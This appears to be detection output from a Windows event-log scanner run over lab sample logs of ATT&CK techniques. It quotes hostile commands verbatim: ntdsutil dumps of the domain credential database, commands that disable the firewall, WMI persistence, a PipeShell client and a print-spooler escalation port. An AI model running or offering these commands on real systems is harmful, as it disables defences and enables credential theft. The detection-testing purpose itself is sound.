Log,Invoke-PipeShell -mode client -server localhost 
-aeskey aaaabbbbccccdddd -pipe eventlog_svc -i -timeout 1000,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 13:06:06.151 +00:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.IO.Pipes.NamedPipeClientStream"" ParameterBinding(New-Object): name=""ArgumentList""; value=""localhost, eventlog_svc, InOut, None, Impersonation""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 13:06:06.161 +00:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,"] Waiting for client..`n"" $PipeObject.WaitForConnection() } else { try { # Add a 1s time-out in case the server is not live $PipeObject.Connect($timeout) } catch { echo ""[!] Server pipe not available!"" Return } } $PipeReader = $PipeWriter = $null $PipeReader = new-object System.IO.StreamReader($PipeObject) $PipeWriter = new-object System.IO.StreamWriter($PipeObject) $PipeWriter.AutoFlush = $true Initialize-Session }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 13:06:07.154 +00:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Output): ""Write-Output"" ParameterBinding(Write-Output): name=""InputObject""; value=""[!] 
Server pipe not available!""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 13:06:07.154 +00:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""+----------------------------------- | Host Name : JUMP01 | Named Pipe : eventlog_svc | AES Key : aaaabbbbccccdddd | Timeout : 1000 +-----------------------------------"" ParameterBinding(Out-Default): name=""InputObject""; value=""[!] Server pipe not available!""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 13:06:07.156 +00:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 13:06:07.157 +00:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 13:06:27.069 +00:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): 
""PSConsoleHostReadline""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 13:06:27.070 +00:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,Invoke-PipeShell -mode client -server localhost -aeskey aaaabbbbccccdddd -pipe eventlog_svc -timeout 1000 -c ls,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 13:06:27.073 +00:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.IO.Pipes.NamedPipeClientStream"" ParameterBinding(New-Object): name=""ArgumentList""; value=""localhost, eventlog_svc, InOut, None, Impersonation""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 13:06:28.071 +00:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Output): ""Write-Output"" ParameterBinding(Write-Output): name=""InputObject""; value=""[!] 
Server pipe not available!""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 13:06:28.072 +00:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""+----------------------------------- | Host Name : JUMP01 | Named Pipe : eventlog_svc | AES Key : aaaabbbbccccdddd | Timeout : 1000 +-----------------------------------"" ParameterBinding(Out-Default): name=""InputObject""; value=""[!] Server pipe not available!""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 17:42:33.379 +00:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Resolve-Path): ""Resolve-Path"" ParameterBinding(Resolve-Path): name=""ErrorAction""; value=""Ignore"" ParameterBinding(Resolve-Path): name=""WarningAction""; value=""Ignore"" ParameterBinding(Resolve-Path): name=""InformationAction""; value=""Ignore"" ParameterBinding(Resolve-Path): name=""Verbose""; value=""False"" ParameterBinding(Resolve-Path): name=""Debug""; value=""False"" ParameterBinding(Resolve-Path): name=""Path""; value=""Net*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID800-4103-4104-Print spooler privilege escalation (CVE-2020-1048).evtx +2021-06-03 17:42:35.914 +00:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): 
""PSConsoleHostReadline""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID800-4103-4104-Print spooler privilege escalation (CVE-2020-1048).evtx +2021-06-03 17:42:35.915 +00:00,fs01.offsec.lan,4104,info,,PwSh Scriptblock Log,Add-PrinterPort -Name .\NetshHelperBeacon.dll,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID800-4103-4104-Print spooler privilege escalation (CVE-2020-1048).evtx +2021-06-03 17:42:35.939 +00:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Add-PrinterPort): ""Add-PrinterPort"" ParameterBinding(Add-PrinterPort): name=""Name""; value="".\NetshHelperBeacon.dll"" ParameterBinding(Add-PrinterPort): name=""ComputerName""; value="""" ParameterBinding(Add-PrinterPort): name=""HostName""; value="""" ParameterBinding(Add-PrinterPort): name=""PrinterName""; value="""" ParameterBinding(Add-PrinterPort): name=""PrinterHostAddress""; value="""" ParameterBinding(Add-PrinterPort): name=""PortNumber""; value=""0"" ParameterBinding(Add-PrinterPort): name=""SNMP""; value=""0"" ParameterBinding(Add-PrinterPort): name=""SNMPCommunity""; value="""" ParameterBinding(Add-PrinterPort): name=""LprHostAddress""; value="""" ParameterBinding(Add-PrinterPort): name=""LprQueueName""; value="""" ParameterBinding(Add-PrinterPort): name=""LprByteCounting""; value=""False"" ParameterBinding(Add-PrinterPort): name=""ThrottleLimit""; value=""0"" ParameterBinding(Add-PrinterPort): name=""AsJob""; value=""False""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID800-4103-4104-Print spooler privilege escalation (CVE-2020-1048).evtx +2021-06-03 
17:42:35.939 +00:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID800-4103-4104-Print spooler privilege escalation (CVE-2020-1048).evtx +2021-06-03 18:34:12.671 +00:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx +2021-06-03 18:34:12.672 +00:00,fs01.offsec.lan,4104,info,,PwSh Scriptblock Log,"Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled False",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx +2021-06-03 18:34:12.672 +00:00,fs01.offsec.lan,4104,high,Evas,Windows Firewall Profile Disabled,,rules/sigma/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx +2021-06-03 18:34:12.887 +00:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-NetFirewallProfile): ""Set-NetFirewallProfile"" ParameterBinding(Set-NetFirewallProfile): name=""Name""; value=""Domain, Public, Private"" ParameterBinding(Set-NetFirewallProfile): name=""Enabled""; value=""False"" ParameterBinding(Set-NetFirewallProfile): name=""All""; value=""False"" ParameterBinding(Set-NetFirewallProfile): name=""PolicyStore""; 
value="""" ParameterBinding(Set-NetFirewallProfile): name=""GPOSession""; value="""" ParameterBinding(Set-NetFirewallProfile): name=""LogFileName""; value="""" ParameterBinding(Set-NetFirewallProfile): name=""LogMaxSizeKilobytes""; value=""0"" ParameterBinding(Set-NetFirewallProfile): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-NetFirewallProfile): name=""AsJob""; value=""False"" ParameterBinding(Set-NetFirewallProfile): name=""PassThru""; value=""False""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx +2021-06-03 18:34:12.888 +00:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx +2021-06-03 18:34:12.889 +00:00,fs01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx +2021-06-03 18:34:12.895 +00:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx +2021-06-03 19:17:44.873 +00:00,fs01.offsec.lan,1102,high,Evas,Security Log 
Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx +2021-06-03 19:17:46.489 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh a s p state off | Path: C:\Windows\System32\netsh.exe | PID: 0xfa8 | User: admmig | LID: 0x46b7b4,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx +2021-06-03 19:17:46.577 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh advfirewall set privateprofile state off | Path: C:\Windows\System32\netsh.exe | PID: 0x10fc | User: admmig | LID: 0x46b7b4,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx +2021-06-03 19:17:46.577 +00:00,fs01.offsec.lan,4688,medium,Evas,Firewall Disabled via Netsh,,rules/sigma/process_creation_builtin/proc_creation_win_susp_firewall_disable.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx +2021-06-03 19:17:46.666 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh f s o d | Path: C:\Windows\System32\netsh.exe | PID: 0x1598 | User: admmig | LID: 0x46b7b4,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair 
Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx +2021-06-03 19:17:47.699 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh firewall set opmode disable | Path: C:\Windows\System32\netsh.exe | PID: 0x1504 | User: admmig | LID: 0x46b7b4,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx +2021-06-03 19:39:52.893 +00:00,fs01.offsec.lan,2003,low,,Setting Change in Windows Firewall with Advanced Security,,rules/sigma/builtin/firewall_as/win_firewall_as_setting_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx +2021-06-03 19:39:52.895 +00:00,fs01.offsec.lan,2003,low,,Setting Change in Windows Firewall with Advanced Security,,rules/sigma/builtin/firewall_as/win_firewall_as_setting_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx +2021-06-03 19:39:53.056 +00:00,fs01.offsec.lan,2003,low,,Setting Change in Windows Firewall with Advanced Security,,rules/sigma/builtin/firewall_as/win_firewall_as_setting_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx +2021-06-04 08:41:47.982 +00:00,exchange01.offsec.lan,6,high,Persis,Failed MSExchange Transport Agent Installation,,rules/sigma/builtin/msexchange/win_exchange_transportagent_failed.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID6-Failed to install an Exchange transport agent.evtx +2021-06-04 08:41:48.041 
+00:00,exchange01.offsec.lan,6,high,Persis,Failed MSExchange Transport Agent Installation,,rules/sigma/builtin/msexchange/win_exchange_transportagent_failed.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID6-Failed to install an Exchange transport agent.evtx +2021-06-04 09:30:48.170 +00:00,exchange01.offsec.lan,11,info,,File Created,Path: E:\Exchange2016\TransportRoles\Shared\agents.config | Process: C:\Program Files (x86)\Notepad++\notepad++.exe | PID: 19108 | PGUID: 6D3C60FE-F13D-60B9-22E2-010000001D00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID11-Exchange transport config modified.evtx +2021-06-05 19:35:16.721 +00:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\hacker' q q | Path: C:\Windows\System32\ntdsutil.exe | PID: 0x724 | User: admmig | LID: 0xa8a1627a,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-IFM created.evtx +2021-06-05 19:35:16.721 +00:00,rootdc1.offsec.lan,4688,medium,CredAccess,Invocation of Active Directory Diagnostic Tool (ntdsutil.exe),,rules/sigma/process_creation_builtin/proc_creation_win_susp_ntdsutil.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-IFM created.evtx +2021-06-05 19:35:16.721 +00:00,rootdc1.offsec.lan,4688,high,CredAccess,Suspicious Process Patterns NTDS.DIT Exfil,,rules/sigma/process_creation_builtin/proc_creation_win_susp_ntds.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-IFM created.evtx +2021-06-05 19:36:32.683 +00:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ntdsutil ""activate instance 
ntds"" ifm ""create full c:\hacker"" quit quit | Path: C:\Windows\System32\ntdsutil.exe | PID: 0x1bec | User: admmig | LID: 0xa8a1627a",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-IFM created.evtx +2021-06-05 19:36:32.683 +00:00,rootdc1.offsec.lan,4688,medium,CredAccess,Invocation of Active Directory Diagnostic Tool (ntdsutil.exe),,rules/sigma/process_creation_builtin/proc_creation_win_susp_ntdsutil.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-IFM created.evtx +2021-06-05 20:17:05.433 +00:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: diskshadow.exe /s shadow.txt | Path: C:\Windows\System32\diskshadow.exe | PID: 0xda8 | User: admmig | LID: 0xa8a1627a,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-Diskshadow abuse.evtx +2021-06-05 20:17:05.433 +00:00,rootdc1.offsec.lan,4688,high,Exec,Execution via Diskshadow.exe,,rules/sigma/process_creation_builtin/proc_creation_win_susp_diskshadow.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-Diskshadow abuse.evtx +2021-06-09 19:29:58.239 +00:00,fs01.offsec.lan,20,medium,,WMI Event Consumer Activity,"technique_id=T1047,technique_name=Windows Management Instrumentation | Created | Type: Command Line | Name: ""Evil"" | Dst: ""cmd.exe /c echo %ProcessId% >> c:\\\\temp\\\\log.txt"" | User: OFFSEC\admmig",rules/hayabusa/sysmon/alerts/20_WmiEventConsumerActivity_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID19-20-WMI registration via PowerLurk.evtx +2021-06-09 19:29:58.240 +00:00,fs01.offsec.lan,19,medium,,WMI Event Filter 
Activity_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | Created | Namespace: ""root/cimv2"" | Name: ""Evil"" | Query: ""SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'"" | User: OFFSEC\admmig",rules/hayabusa/sysmon/alerts/19_WmiEventFilterActivity_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID19-20-WMI registration via PowerLurk.evtx +2021-06-09 19:29:58.392 +00:00,fs01.offsec.lan,19,medium,,WMI Event Filter Activity_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | Created | Namespace: ""root/cimv2"" | Name: ""Evil"" | Query: ""SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'"" | User: OFFSEC\admmig",rules/hayabusa/sysmon/alerts/19_WmiEventFilterActivity_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID19-20-WMI registration via PowerLurk.evtx +2021-06-10 14:12:46.042 +00:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID800-4103-4104-WMI registration via PowerLurk.evtx +2021-06-10 14:12:46.058 +00:00,fs01.offsec.lan,4104,info,,PwSh Scriptblock Log,"c:\\temp\\log.txt"" -Trigger ProcessStart -ProcessName notepad.exe",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID800-4103-4104-WMI registration via PowerLurk.evtx +2021-06-10 14:12:46.157 +00:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-WmiInstance): ""Set-WmiInstance"" ParameterBinding(Set-WmiInstance): name=""Namespace""; 
value=""root/subscription"" ParameterBinding(Set-WmiInstance): name=""Class""; value=""CommandLineEventConsumer"" ParameterBinding(Set-WmiInstance): name=""Arguments""; value=""System.Collections.Hashtable""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID800-4103-4104-WMI registration via PowerLurk.evtx +2021-06-10 14:12:46.177 +00:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-WmiInstance): ""Set-WmiInstance"" ParameterBinding(Set-WmiInstance): name=""Namespace""; value=""root/subscription"" ParameterBinding(Set-WmiInstance): name=""Class""; value=""__EventFilter"" ParameterBinding(Set-WmiInstance): name=""Arguments""; value=""System.Collections.Hashtable""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID800-4103-4104-WMI registration via PowerLurk.evtx +2021-06-10 21:21:20.636 +00:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4175e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-10 21:21:26.357 +00:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x5a41984,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-10 21:21:26.357 +00:00,fs01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 
2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-10 21:21:26.383 +00:00,fs01.offsec.lan,4698,info,,Task Created,"Name: \bouWFQYO | Content: 2015-07-15T20:35:13.2757294 true 1 S-1-5-18 HighestAvailable InteractiveToken IgnoreNew false false true false true false true true true false false P3D 7 cmd.exe /C whoami > %windir%\Temp\bouWFQYO.tmp 2>&1 \bouWFQYO | User: admmig | LID: 0x5a419bc",rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by ATexec (susp. arg.).evtx +2021-06-10 21:21:26.383 +00:00,fs01.offsec.lan,4698,info,,Task Created,"Name: \bouWFQYO | Content: 2015-07-15T20:35:13.2757294 true 1 S-1-5-18 HighestAvailable InteractiveToken IgnoreNew false false true false true false true true true false false P3D 7 cmd.exe /C whoami > %windir%\Temp\bouWFQYO.tmp 2>&1 \bouWFQYO | User: admmig | LID: 0x5a419bc",rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-10 21:21:26.390 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /C whoami > C:\Windows\Temp\bouWFQYO.tmp 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0x3d0 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-10 21:21:26.390 +00:00,fs01.offsec.lan,4688,low,Evas,Cmd Stream 
Redirection,,rules/sigma/process_creation_builtin/proc_creation_win_redirect_to_stream.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-10 21:21:26.390 +00:00,fs01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-10 21:21:26.395 +00:00,fs01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-10 21:21:26.406 +00:00,fs01.offsec.lan,4699,info,,Task Deleted,Name: \bouWFQYO | User: admmig | LID: 0x5a419bc,rules/hayabusa/non-default/events/Security/ScheduledTasks/4699_ScheduledTaskDeleted.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by ATexec 